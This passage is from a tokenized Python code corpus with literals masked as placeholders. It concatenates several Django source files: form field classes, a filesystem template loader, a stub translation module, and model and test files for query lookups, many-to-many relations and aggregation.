urlsplit ( value ) ) <EOL> if not url_fields [ <NUM_LIT:0> ] : <EOL> url_fields [ <NUM_LIT:0> ] = '<STR_LIT:http>' <EOL> if not url_fields [ <NUM_LIT:1> ] : <EOL> url_fields [ <NUM_LIT:1> ] = url_fields [ <NUM_LIT:2> ] <EOL> url_fields [ <NUM_LIT:2> ] = '<STR_LIT>' <EOL> value = urlparse . urlunsplit ( url_fields ) <EOL> url_fields = list ( urlparse . urlsplit ( value ) ) <EOL> if not url_fields [ <NUM_LIT:2> ] : <EOL> url_fields [ <NUM_LIT:2> ] = '<STR_LIT:/>' <EOL> value = urlparse . urlunsplit ( url_fields ) <EOL> return super ( URLField , self ) . to_python ( value ) <EOL> class BooleanField ( Field ) : <EOL> widget = CheckboxInput <EOL> def to_python ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if value in ( '<STR_LIT:False>' , '<STR_LIT:0>' ) : <EOL> value = False <EOL> else : <EOL> value = bool ( value ) <EOL> value = super ( BooleanField , self ) . to_python ( value ) <EOL> if not value and self . required : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> return value <EOL> class NullBooleanField ( BooleanField ) : <EOL> """<STR_LIT>""" <EOL> widget = NullBooleanSelect <EOL> def to_python ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if value in ( True , '<STR_LIT:True>' , '<STR_LIT:1>' ) : <EOL> return True <EOL> elif value in ( False , '<STR_LIT:False>' , '<STR_LIT:0>' ) : <EOL> return False <EOL> else : <EOL> return None <EOL> def validate ( self , value ) : <EOL> pass <EOL> class ChoiceField ( Field ) : <EOL> widget = Select <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> def __init__ ( self , choices = ( ) , required = True , widget = None , label = None , <EOL> initial = None , help_text = None , * args , ** kwargs ) : <EOL> super ( ChoiceField , self ) . __init__ ( required = required , widget = widget , label = label , <EOL> initial = initial , help_text = help_text , * args , ** kwargs ) <EOL> self . choices = choices <EOL> def _get_choices ( self ) : <EOL> return self . 
_choices <EOL> def _set_choices ( self , value ) : <EOL> self . _choices = self . widget . choices = list ( value ) <EOL> choices = property ( _get_choices , _set_choices ) <EOL> def to_python ( self , value ) : <EOL> "<STR_LIT>" <EOL> if value in validators . EMPTY_VALUES : <EOL> return u'<STR_LIT>' <EOL> return smart_unicode ( value ) <EOL> def validate ( self , value ) : <EOL> """<STR_LIT>""" <EOL> super ( ChoiceField , self ) . validate ( value ) <EOL> if value and not self . valid_value ( value ) : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] % { '<STR_LIT:value>' : value } ) <EOL> def valid_value ( self , value ) : <EOL> "<STR_LIT>" <EOL> for k , v in self . choices : <EOL> if isinstance ( v , ( list , tuple ) ) : <EOL> for k2 , v2 in v : <EOL> if value == smart_unicode ( k2 ) : <EOL> return True <EOL> else : <EOL> if value == smart_unicode ( k ) : <EOL> return True <EOL> return False <EOL> class TypedChoiceField ( ChoiceField ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . coerce = kwargs . pop ( '<STR_LIT>' , lambda val : val ) <EOL> self . empty_value = kwargs . pop ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> super ( TypedChoiceField , self ) . __init__ ( * args , ** kwargs ) <EOL> def to_python ( self , value ) : <EOL> """<STR_LIT>""" <EOL> value = super ( TypedChoiceField , self ) . to_python ( value ) <EOL> super ( TypedChoiceField , self ) . validate ( value ) <EOL> if value == self . empty_value or value in validators . EMPTY_VALUES : <EOL> return self . empty_value <EOL> try : <EOL> value = self . coerce ( value ) <EOL> except ( ValueError , TypeError , ValidationError ) : <EOL> raise ValidationError ( self . 
error_messages [ '<STR_LIT>' ] % { '<STR_LIT:value>' : value } ) <EOL> return value <EOL> def validate ( self , value ) : <EOL> pass <EOL> class MultipleChoiceField ( ChoiceField ) : <EOL> hidden_widget = MultipleHiddenInput <EOL> widget = SelectMultiple <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> def to_python ( self , value ) : <EOL> if not value : <EOL> return [ ] <EOL> elif not isinstance ( value , ( list , tuple ) ) : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> return [ smart_unicode ( val ) for val in value ] <EOL> def validate ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if self . required and not value : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> for val in value : <EOL> if not self . valid_value ( val ) : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] % { '<STR_LIT:value>' : val } ) <EOL> class ComboField ( Field ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , fields = ( ) , * args , ** kwargs ) : <EOL> super ( ComboField , self ) . __init__ ( * args , ** kwargs ) <EOL> for f in fields : <EOL> f . required = False <EOL> self . fields = fields <EOL> def clean ( self , value ) : <EOL> """<STR_LIT>""" <EOL> super ( ComboField , self ) . clean ( value ) <EOL> for field in self . fields : <EOL> value = field . clean ( value ) <EOL> return value <EOL> class MultiValueField ( Field ) : <EOL> """<STR_LIT>""" <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> def __init__ ( self , fields = ( ) , * args , ** kwargs ) : <EOL> super ( MultiValueField , self ) . __init__ ( * args , ** kwargs ) <EOL> for f in fields : <EOL> f . required = False <EOL> self . 
fields = fields <EOL> def validate ( self , value ) : <EOL> pass <EOL> def clean ( self , value ) : <EOL> """<STR_LIT>""" <EOL> clean_data = [ ] <EOL> errors = ErrorList ( ) <EOL> if not value or isinstance ( value , ( list , tuple ) ) : <EOL> if not value or not [ v for v in value if v not in validators . EMPTY_VALUES ] : <EOL> if self . required : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> else : <EOL> return self . compress ( [ ] ) <EOL> else : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> for i , field in enumerate ( self . fields ) : <EOL> try : <EOL> field_value = value [ i ] <EOL> except IndexError : <EOL> field_value = None <EOL> if self . required and field_value in validators . EMPTY_VALUES : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> try : <EOL> clean_data . append ( field . clean ( field_value ) ) <EOL> except ValidationError , e : <EOL> errors . extend ( e . messages ) <EOL> if errors : <EOL> raise ValidationError ( errors ) <EOL> out = self . compress ( clean_data ) <EOL> self . validate ( out ) <EOL> return out <EOL> def compress ( self , data_list ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( '<STR_LIT>' ) <EOL> class FilePathField ( ChoiceField ) : <EOL> def __init__ ( self , path , match = None , recursive = False , required = True , <EOL> widget = None , label = None , initial = None , help_text = None , <EOL> * args , ** kwargs ) : <EOL> self . path , self . match , self . recursive = path , match , recursive <EOL> super ( FilePathField , self ) . __init__ ( choices = ( ) , required = required , <EOL> widget = widget , label = label , initial = initial , help_text = help_text , <EOL> * args , ** kwargs ) <EOL> if self . required : <EOL> self . choices = [ ] <EOL> else : <EOL> self . choices = [ ( "<STR_LIT>" , "<STR_LIT>" ) ] <EOL> if self . match is not None : <EOL> self . match_re = re . compile ( self . 
match ) <EOL> if recursive : <EOL> for root , dirs , files in sorted ( os . walk ( self . path ) ) : <EOL> for f in files : <EOL> if self . match is None or self . match_re . search ( f ) : <EOL> f = os . path . join ( root , f ) <EOL> self . choices . append ( ( f , f . replace ( path , "<STR_LIT>" , <NUM_LIT:1> ) ) ) <EOL> else : <EOL> try : <EOL> for f in sorted ( os . listdir ( self . path ) ) : <EOL> full_file = os . path . join ( self . path , f ) <EOL> if os . path . isfile ( full_file ) and ( self . match is None or self . match_re . search ( f ) ) : <EOL> self . choices . append ( ( full_file , f ) ) <EOL> except OSError : <EOL> pass <EOL> self . widget . choices = self . choices <EOL> class SplitDateTimeField ( MultiValueField ) : <EOL> widget = SplitDateTimeWidget <EOL> hidden_widget = SplitHiddenDateTimeWidget <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> def __init__ ( self , input_date_formats = None , input_time_formats = None , * args , ** kwargs ) : <EOL> errors = self . default_error_messages . copy ( ) <EOL> if '<STR_LIT>' in kwargs : <EOL> errors . update ( kwargs [ '<STR_LIT>' ] ) <EOL> localize = kwargs . get ( '<STR_LIT>' , False ) <EOL> fields = ( <EOL> DateField ( input_formats = input_date_formats , <EOL> error_messages = { '<STR_LIT>' : errors [ '<STR_LIT>' ] } , <EOL> localize = localize ) , <EOL> TimeField ( input_formats = input_time_formats , <EOL> error_messages = { '<STR_LIT>' : errors [ '<STR_LIT>' ] } , <EOL> localize = localize ) , <EOL> ) <EOL> super ( SplitDateTimeField , self ) . __init__ ( fields , * args , ** kwargs ) <EOL> def compress ( self , data_list ) : <EOL> if data_list : <EOL> if data_list [ <NUM_LIT:0> ] in validators . EMPTY_VALUES : <EOL> raise ValidationError ( self . error_messages [ '<STR_LIT>' ] ) <EOL> if data_list [ <NUM_LIT:1> ] in validators . EMPTY_VALUES : <EOL> raise ValidationError ( self . 
error_messages [ '<STR_LIT>' ] ) <EOL> return datetime . datetime . combine ( * data_list ) <EOL> return None <EOL> class IPAddressField ( CharField ) : <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u'<STR_LIT>' ) , <EOL> } <EOL> default_validators = [ validators . validate_ipv4_address ] <EOL> class SlugField ( CharField ) : <EOL> default_error_messages = { <EOL> '<STR_LIT>' : _ ( u"<STR_LIT>" <EOL> u"<STR_LIT>" ) , <EOL> } <EOL> default_validators = [ validators . validate_slug ] </s>
<s> """<STR_LIT>""" <EOL> from django . conf import settings <EOL> from django . template import TemplateDoesNotExist <EOL> from django . template . loader import BaseLoader <EOL> from django . utils . _os import safe_join <EOL> class Loader ( BaseLoader ) : <EOL> is_usable = True <EOL> def get_template_sources ( self , template_name , template_dirs = None ) : <EOL> """<STR_LIT>""" <EOL> if not template_dirs : <EOL> template_dirs = settings . TEMPLATE_DIRS <EOL> for template_dir in template_dirs : <EOL> try : <EOL> yield safe_join ( template_dir , template_name ) <EOL> except UnicodeDecodeError : <EOL> raise <EOL> except ValueError : <EOL> pass <EOL> def load_template_source ( self , template_name , template_dirs = None ) : <EOL> tried = [ ] <EOL> for filepath in self . get_template_sources ( template_name , template_dirs ) : <EOL> try : <EOL> file = open ( filepath ) <EOL> try : <EOL> return ( file . read ( ) . decode ( settings . FILE_CHARSET ) , filepath ) <EOL> finally : <EOL> file . close ( ) <EOL> except IOError : <EOL> tried . append ( filepath ) <EOL> if tried : <EOL> error_msg = "<STR_LIT>" % tried <EOL> else : <EOL> error_msg = "<STR_LIT>" <EOL> raise TemplateDoesNotExist ( error_msg ) <EOL> load_template_source . is_usable = True <EOL> _loader = Loader ( ) <EOL> def load_template_source ( template_name , template_dirs = None ) : <EOL> import warnings <EOL> warnings . warn ( <EOL> "<STR_LIT>" , <EOL> PendingDeprecationWarning <EOL> ) <EOL> return _loader . load_template_source ( template_name , template_dirs ) <EOL> load_template_source . is_usable = True </s>
<s> import warnings <EOL> from django . conf import settings <EOL> from django . utils . encoding import force_unicode <EOL> from django . utils . safestring import mark_safe , SafeData <EOL> def ngettext ( singular , plural , number ) : <EOL> if number == <NUM_LIT:1> : return singular <EOL> return plural <EOL> ngettext_lazy = ngettext <EOL> def ungettext ( singular , plural , number ) : <EOL> return force_unicode ( ngettext ( singular , plural , number ) ) <EOL> activate = lambda x : None <EOL> deactivate = deactivate_all = lambda : None <EOL> get_language = lambda : settings . LANGUAGE_CODE <EOL> get_language_bidi = lambda : settings . LANGUAGE_CODE in settings . LANGUAGES_BIDI <EOL> check_for_language = lambda x : True <EOL> TECHNICAL_ID_MAP = { <EOL> "<STR_LIT>" : settings . DATETIME_FORMAT , <EOL> "<STR_LIT>" : settings . DATE_FORMAT , <EOL> "<STR_LIT>" : settings . DATETIME_FORMAT , <EOL> "<STR_LIT>" : settings . TIME_FORMAT , <EOL> "<STR_LIT>" : settings . YEAR_MONTH_FORMAT , <EOL> "<STR_LIT>" : settings . MONTH_DAY_FORMAT , <EOL> } <EOL> def gettext ( message ) : <EOL> result = TECHNICAL_ID_MAP . get ( message , message ) <EOL> if isinstance ( message , SafeData ) : <EOL> return mark_safe ( result ) <EOL> return result <EOL> def ugettext ( message ) : <EOL> return force_unicode ( gettext ( message ) ) <EOL> gettext_noop = gettext_lazy = _ = gettext <EOL> def to_locale ( language ) : <EOL> p = language . find ( '<STR_LIT:->' ) <EOL> if p >= <NUM_LIT:0> : <EOL> return language [ : p ] . lower ( ) + '<STR_LIT:_>' + language [ p + <NUM_LIT:1> : ] . upper ( ) <EOL> else : <EOL> return language . lower ( ) <EOL> def get_language_from_request ( request ) : <EOL> return settings . LANGUAGE_CODE <EOL> def get_date_formats ( ) : <EOL> warnings . warn ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> PendingDeprecationWarning <EOL> ) <EOL> return settings . DATE_FORMAT , settings . DATETIME_FORMAT , settings . 
TIME_FORMAT <EOL> def get_partial_date_formats ( ) : <EOL> warnings . warn ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> PendingDeprecationWarning <EOL> ) <EOL> return settings . YEAR_MONTH_FORMAT , settings . MONTH_DAY_FORMAT </s>
<s> """<STR_LIT>""" <EOL> from django . db import models , DEFAULT_DB_ALIAS <EOL> class Article ( models . Model ) : <EOL> headline = models . CharField ( max_length = <NUM_LIT:100> , default = '<STR_LIT>' ) <EOL> pub_date = models . DateTimeField ( ) <EOL> class Meta : <EOL> ordering = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __unicode__ ( self ) : <EOL> return self . headline </s>
<s> </s>
<s> from django . db import models <EOL> from datetime import datetime <EOL> class Person ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT> ) <EOL> class Meta : <EOL> ordering = ( '<STR_LIT:name>' , ) <EOL> def __unicode__ ( self ) : <EOL> return self . name <EOL> class Group ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT> ) <EOL> members = models . ManyToManyField ( Person , through = '<STR_LIT>' ) <EOL> custom_members = models . ManyToManyField ( Person , through = '<STR_LIT>' , related_name = "<STR_LIT>" ) <EOL> nodefaultsnonulls = models . ManyToManyField ( Person , through = '<STR_LIT>' , related_name = "<STR_LIT>" ) <EOL> class Meta : <EOL> ordering = ( '<STR_LIT:name>' , ) <EOL> def __unicode__ ( self ) : <EOL> return self . name <EOL> class Membership ( models . Model ) : <EOL> person = models . ForeignKey ( Person ) <EOL> group = models . ForeignKey ( Group ) <EOL> date_joined = models . DateTimeField ( default = datetime . now ) <EOL> invite_reason = models . CharField ( max_length = <NUM_LIT:64> , null = True ) <EOL> class Meta : <EOL> ordering = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __unicode__ ( self ) : <EOL> return "<STR_LIT>" % ( self . person . name , self . group . name ) <EOL> class CustomMembership ( models . Model ) : <EOL> person = models . ForeignKey ( Person , db_column = "<STR_LIT>" , related_name = "<STR_LIT>" ) <EOL> group = models . ForeignKey ( Group ) <EOL> weird_fk = models . ForeignKey ( Membership , null = True ) <EOL> date_joined = models . DateTimeField ( default = datetime . now ) <EOL> def __unicode__ ( self ) : <EOL> return "<STR_LIT>" % ( self . person . name , self . group . name ) <EOL> class Meta : <EOL> db_table = "<STR_LIT>" <EOL> class TestNoDefaultsOrNulls ( models . Model ) : <EOL> person = models . ForeignKey ( Person ) <EOL> group = models . ForeignKey ( Group ) <EOL> nodefaultnonull = models . 
CharField ( max_length = <NUM_LIT:5> ) <EOL> class PersonSelfRefM2M ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:5> ) <EOL> friends = models . ManyToManyField ( '<STR_LIT>' , through = "<STR_LIT>" , symmetrical = False ) <EOL> def __unicode__ ( self ) : <EOL> return self . name <EOL> class Friendship ( models . Model ) : <EOL> first = models . ForeignKey ( PersonSelfRefM2M , related_name = "<STR_LIT>" ) <EOL> second = models . ForeignKey ( PersonSelfRefM2M , related_name = "<STR_LIT>" ) <EOL> date_friended = models . DateTimeField ( ) </s>
<s> from datetime import datetime <EOL> from operator import attrgetter <EOL> from django . db . models import Q <EOL> from django . test import TestCase <EOL> from models import Article <EOL> class OrLookupsTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . a1 = Article . objects . create ( <EOL> headline = '<STR_LIT>' , pub_date = datetime ( <NUM_LIT> , <NUM_LIT:11> , <NUM_LIT> ) <EOL> ) . pk <EOL> self . a2 = Article . objects . create ( <EOL> headline = '<STR_LIT>' , pub_date = datetime ( <NUM_LIT> , <NUM_LIT:11> , <NUM_LIT> ) <EOL> ) . pk <EOL> self . a3 = Article . objects . create ( <EOL> headline = '<STR_LIT>' , pub_date = datetime ( <NUM_LIT> , <NUM_LIT:11> , <NUM_LIT> ) <EOL> ) . pk <EOL> def test_filter_or ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( headline__startswith = '<STR_LIT>' ) | Article . objects . filter ( headline__startswith = '<STR_LIT>' ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( headline__contains = '<STR_LIT>' ) | Article . objects . filter ( headline__contains = '<STR_LIT>' ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( headline__iexact = '<STR_LIT>' ) | Article . objects . filter ( headline__contains = '<STR_LIT>' ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( Q ( headline__startswith = '<STR_LIT>' ) | Q ( headline__startswith = '<STR_LIT>' ) ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) <EOL> ) <EOL> def test_stages ( self ) : <EOL> articles = Article . objects . all ( ) <EOL> self . 
assertQuerysetEqual ( <EOL> articles . filter ( headline__startswith = '<STR_LIT>' ) & articles . filter ( headline__startswith = '<STR_LIT>' ) , <EOL> [ ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> articles . filter ( headline__startswith = '<STR_LIT>' ) & articles . filter ( headline__contains = '<STR_LIT>' ) , [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) <EOL> ) <EOL> def test_pk_q ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( Q ( pk = self . a1 ) | Q ( pk = self . a2 ) ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( Q ( pk = self . a1 ) | Q ( pk = self . a2 ) | Q ( pk = self . a3 ) ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) , <EOL> ) <EOL> def test_pk_in ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( pk__in = [ self . a1 , self . a2 , self . a3 ] ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) , <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( pk__in = ( self . a1 , self . a2 , self . a3 ) ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) , <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( pk__in = [ self . a1 , self . a2 , self . a3 , <NUM_LIT> ] ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) , <EOL> ) <EOL> def test_q_negated ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( Q ( pk = self . a1 ) | ~ Q ( pk = self . a2 ) ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( ~ Q ( pk = self . a1 ) & ~ Q ( pk = self . 
a2 ) ) , [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) , <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( Q ( pk = self . a1 ) & ( ~ Q ( pk = self . a2 ) | Q ( pk = self . a3 ) ) ) , [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) , <EOL> ) <EOL> def test_complex_filter ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . complex_filter ( { '<STR_LIT>' : self . a1 } ) , [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) , <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . complex_filter ( Q ( pk = self . a1 ) | Q ( pk = self . a2 ) ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) , <EOL> ) <EOL> def test_empty_in ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( pk__in = [ ] ) , <EOL> [ ] <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( Q ( pk__in = [ ] ) | Q ( headline__icontains = '<STR_LIT>' ) ) , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) , <EOL> ) <EOL> def test_q_and ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( Q ( headline__startswith = '<STR_LIT>' ) , Q ( headline__contains = '<STR_LIT>' ) ) , [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( Q ( headline__contains = '<STR_LIT>' ) , headline__startswith = '<STR_LIT>' ) , [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) , <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( Q ( headline__startswith = '<STR_LIT>' ) & Q ( headline__startswith = '<STR_LIT>' ) ) , <EOL> [ ] <EOL> ) <EOL> def test_q_exclude ( self ) : <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . 
exclude ( Q ( headline__startswith = '<STR_LIT>' ) ) , [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> attrgetter ( "<STR_LIT>" ) <EOL> ) <EOL> def test_other_arg_queries ( self ) : <EOL> self . assertEqual ( <EOL> Article . objects . get ( Q ( headline__startswith = '<STR_LIT>' ) , Q ( headline__contains = '<STR_LIT>' ) ) . headline , <EOL> '<STR_LIT>' <EOL> ) <EOL> self . assertEqual ( <EOL> Article . objects . filter ( Q ( headline__startswith = '<STR_LIT>' ) | Q ( headline__contains = '<STR_LIT>' ) ) . count ( ) , <EOL> <NUM_LIT:3> <EOL> ) <EOL> self . assertQuerysetEqual ( <EOL> Article . objects . filter ( Q ( headline__startswith = '<STR_LIT>' ) , Q ( headline__contains = '<STR_LIT>' ) ) . values ( ) , [ <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT:id>" : self . a3 , "<STR_LIT>" : datetime ( <NUM_LIT> , <NUM_LIT:11> , <NUM_LIT> ) } , <EOL> ] , <EOL> lambda o : o , <EOL> ) <EOL> self . assertEqual ( <EOL> Article . objects . filter ( Q ( headline__startswith = '<STR_LIT>' ) ) . in_bulk ( [ self . a1 , self . a2 ] ) , <EOL> { self . a1 : Article . objects . get ( pk = self . a1 ) } <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from django . db import models <EOL> class Article ( models . Model ) : <EOL> headline = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> pub_date = models . DateTimeField ( ) <EOL> def __str__ ( self ) : <EOL> return self . headline <EOL> class InternationalArticle ( models . Model ) : <EOL> headline = models . CharField ( max_length = <NUM_LIT:100> ) <EOL> pub_date = models . DateTimeField ( ) <EOL> def __unicode__ ( self ) : <EOL> return self . headline </s>
<s> """<STR_LIT>""" <EOL> from django . db import models <EOL> class Person ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:200> ) <EOL> class Place ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:200> ) </s>
<s> import datetime <EOL> import pickle <EOL> from decimal import Decimal <EOL> from operator import attrgetter <EOL> from django . conf import settings <EOL> from django . core . exceptions import FieldError <EOL> from django . db import DEFAULT_DB_ALIAS <EOL> from django . db . models import Count , Max , Avg , Sum , StdDev , Variance , F , Q <EOL> from django . test import TestCase , Approximate <EOL> from models import Author , Book , Publisher , Clues , Entries , HardbackBook <EOL> def run_stddev_tests ( ) : <EOL> """<STR_LIT>""" <EOL> if settings . DATABASES [ DEFAULT_DB_ALIAS ] [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> return False <EOL> class StdDevPop ( object ) : <EOL> sql_function = '<STR_LIT>' <EOL> try : <EOL> connection . ops . check_aggregate_support ( StdDevPop ( ) ) <EOL> except : <EOL> return False <EOL> return True <EOL> class AggregationTests ( TestCase ) : <EOL> def assertObjectAttrs ( self , obj , ** kwargs ) : <EOL> for attr , value in kwargs . iteritems ( ) : <EOL> self . assertEqual ( getattr ( obj , attr ) , value ) <EOL> def test_aggregates_in_where_clause ( self ) : <EOL> """<STR_LIT>""" <EOL> qs = Book . objects . values ( '<STR_LIT>' ) . annotate ( Max ( '<STR_LIT:id>' ) ) <EOL> qs = qs . order_by ( '<STR_LIT>' ) . values_list ( '<STR_LIT>' , flat = True ) <EOL> books = Book . objects . order_by ( '<STR_LIT:id>' ) <EOL> qs1 = books . filter ( id__in = qs ) <EOL> qs2 = books . filter ( id__in = list ( qs ) ) <EOL> self . assertEqual ( list ( qs1 ) , list ( qs2 ) ) <EOL> def test_aggregates_in_where_clause_pre_eval ( self ) : <EOL> """<STR_LIT>""" <EOL> qs = Book . objects . values ( '<STR_LIT>' ) . annotate ( Max ( '<STR_LIT:id>' ) ) <EOL> qs = qs . order_by ( '<STR_LIT>' ) . values_list ( '<STR_LIT>' , flat = True ) <EOL> list ( qs ) <EOL> books = Book . objects . order_by ( '<STR_LIT:id>' ) <EOL> qs1 = books . filter ( id__in = qs ) <EOL> qs2 = books . filter ( id__in = list ( qs ) ) <EOL> self . 
assertEqual ( list ( qs1 ) , list ( qs2 ) ) <EOL> if settings . DATABASES [ DEFAULT_DB_ALIAS ] [ '<STR_LIT>' ] != '<STR_LIT>' : <EOL> def test_annotate_with_extra ( self ) : <EOL> """<STR_LIT>""" <EOL> shortest_book_sql = """<STR_LIT>""" <EOL> qs = Publisher . objects . extra ( select = { <EOL> '<STR_LIT>' : shortest_book_sql , <EOL> } ) . annotate ( total_books = Count ( '<STR_LIT>' ) ) <EOL> list ( qs ) <EOL> def test_aggregate ( self ) : <EOL> self . assertEqual ( <EOL> Author . objects . order_by ( "<STR_LIT:name>" ) . aggregate ( Avg ( "<STR_LIT>" ) ) , <EOL> { "<STR_LIT>" : Approximate ( <NUM_LIT> , places = <NUM_LIT:1> ) } <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . aggregate ( Sum ( "<STR_LIT>" ) ) , <EOL> { "<STR_LIT>" : <NUM_LIT> } , <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . aggregate ( Sum ( '<STR_LIT>' ) , Avg ( '<STR_LIT>' ) ) , <EOL> { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : Approximate ( <NUM_LIT> , places = <NUM_LIT:2> ) } <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . values ( ) . aggregate ( Sum ( '<STR_LIT>' ) , Avg ( '<STR_LIT>' ) ) , <EOL> { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : Approximate ( <NUM_LIT> , places = <NUM_LIT:2> ) } <EOL> ) <EOL> self . assertEqual ( <EOL> Book . objects . extra ( select = { '<STR_LIT>' : '<STR_LIT>' } ) . aggregate ( Sum ( '<STR_LIT>' ) ) , <EOL> { '<STR_LIT>' : <NUM_LIT> } <EOL> ) <EOL> def test_annotation ( self ) : <EOL> obj = Book . objects . annotate ( mean_auth_age = Avg ( "<STR_LIT>" ) ) . extra ( select = { "<STR_LIT>" : "<STR_LIT>" } ) . get ( pk = <NUM_LIT:2> ) <EOL> self . assertObjectAttrs ( obj , <EOL> contact_id = <NUM_LIT:3> , <EOL> id = <NUM_LIT:2> , <EOL> isbn = u'<STR_LIT>' , <EOL> mean_auth_age = <NUM_LIT> , <EOL> name = '<STR_LIT>' , <EOL> pages = <NUM_LIT> , <EOL> price = Decimal ( 